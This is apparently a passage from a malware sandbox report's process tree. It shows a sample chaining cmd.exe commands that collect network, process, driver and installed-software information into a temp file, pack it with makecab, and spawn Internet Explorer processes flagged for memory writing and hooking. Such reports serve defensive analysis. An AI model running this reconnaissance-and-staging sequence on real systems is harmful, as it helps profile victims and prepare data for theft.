C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\5708.bin1"2⤵PID:980
-
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:1640
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5708.bin1"2⤵PID:1820
-
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\5708.bin1"2⤵PID:2016
-
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1844
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5708.bin1"2⤵PID:1408
-
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\5708.bin1"2⤵PID:592
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:1784
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5708.bin1"2⤵PID:848
-
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\5708.bin1"2⤵PID:1048
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:1508
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5708.bin1"2⤵PID:1780
-
-
C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5708.bin1 > C:\Users\Admin\AppData\Local\Temp\5708.bin & del C:\Users\Admin\AppData\Local\Temp\5708.bin1"2⤵PID:736
-
-
C:\Windows\system32\makecab.exemakecab.exe /F "C:\Users\Admin\AppData\Local\Temp\91A2.bin"2⤵PID:1248
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1304 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1800
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1016 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1504
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1312 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1012
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1312 CREDAT:1848323 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1720
-